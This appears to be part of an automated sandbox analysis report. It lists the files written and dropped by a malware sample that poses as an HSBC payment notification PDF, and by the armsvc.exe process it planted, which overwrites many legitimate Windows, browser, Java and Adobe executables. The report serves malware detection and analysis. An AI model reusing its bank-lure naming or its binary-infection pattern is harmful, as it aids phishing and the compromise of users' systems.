Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: \hsbc payment notification scan copy ref 62587299-24_pdf.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: \hsbc payment notification scan copy ref 62587299-24_pdf.exe			Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
